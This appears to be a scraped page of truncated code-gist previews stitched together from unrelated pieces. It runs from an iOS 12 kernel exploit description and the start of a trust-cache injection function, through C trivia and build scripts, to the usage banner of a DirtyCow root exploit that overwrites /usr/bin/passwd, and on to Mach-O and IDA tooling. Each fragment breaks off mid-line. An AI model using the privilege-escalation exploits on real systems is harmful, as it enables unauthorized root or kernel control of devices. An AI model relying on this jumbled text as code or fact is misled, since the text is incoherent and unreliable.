This is a kernel exploit targeting iOS 12.0-12.2 and 12.4. It exploits a dangling kernel pointer to craft a fake task port corresponding to the kernel task and gets a send right to it.
This code is not readily compilable — some common sense is a prerequisite. If you do get it going though, it is extremely reliable on any device with more than a gigabyte of RAM. Interested readers may want to investigate how reallocations can be prevented -- this might improve reliability even more.
| void inject_trusts(int pathc, const char *paths[]) | |
| { | |
| printf("[+] injecting into trust cache...\n"); | |
| extern uint64_t g_kern_base; | |
| static uint64_t tc = 0; | |
| if (tc == 0) { | |
| /* loaded_trust_caches | |
| iPhone11,2-4-6: 0xFFFFFFF008F702C8 |
Here's a list of mildly interesting things about the C language that I learned mostly by consuming Clang's ASTs. Although surprises are getting sparser, I might continue to update this document over time.
There are many more mildly interesting features of C++, but the language is literally known for being weird, whereas C is usually considered smaller and simpler, so this is (almost) only about C.
struct foo {
struct bar {
int x;
| /* Note: this Google copyright notice only applies to the original file, which has large sections copy-pasted here. my changes are under CC0 (public domain). | |
| * Copyright 2015 Google Inc. | |
| * | |
| * Use of this source code is governed by a BSD-style license that can be | |
| * found in the LICENSE file. | |
| */ | |
| /* | |
| The official instructions don't work well. These alternative instructions are intended to be the shortest path to get a minimal setup running. |
| #!/bin/bash | |
| # Before running this script: | |
| # Find AC_CHECK_FILES([/proc/self/stat]) in configure.ac and comment it out | |
| # cd into the fish source directory | |
| FLAGS="-stdlib=libc++ -isysroot /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk -target armv7-apple-darwin16 -miphoneos-version-min=8.0.0" | |
| PREFIX=$(pwd)"/deb" | |
| # Build fish |
| #!/bin/bash | |
| ## Environments | |
| # Exit the build pass if any command returns a non-zero value | |
| #set -o errexit | |
| # Echo commands | |
| set -x |
| /* | |
| * (un)comment correct payload first (x86 or x64)! | |
| * | |
| * $ gcc cowroot.c -o cowroot -pthread | |
| * $ ./cowroot | |
| * DirtyCow root privilege escalation | |
| * Backing up /usr/bin/passwd.. to /tmp/bak | |
| * Size of binary: 57048 | |
| * Racing, this may take a while.. | |
| * /usr/bin/passwd overwritten |
| all: | |
| clang machoman.c -dynamiclib -o libmachoman.dylib | |
| clean: | |
| rm -rf libmachoman.dylib |
| // | |
| // main.c | |
| // macho-syms | |
| // | |
| // Created by C0deH4cker on 3/19/16. | |
| // Copyright © 2016 C0deH4cker. All rights reserved. | |
| // | |
| #include <stdio.h> | |
| #include <stdlib.h> |
| # Fix clang function prologues | |
| # WARNING: this WILL patch bytes in the database | |
| # | |
| # Copyright (c) 2015 xerub | |
| # | |
| # This program is free software; you can redistribute it and/or modify | |
| # it under the terms of the GNU General Public License as published by | |
| # the Free Software Foundation; either version 2 of the License, or | |
| # (at your option) any later version. | |
| # |
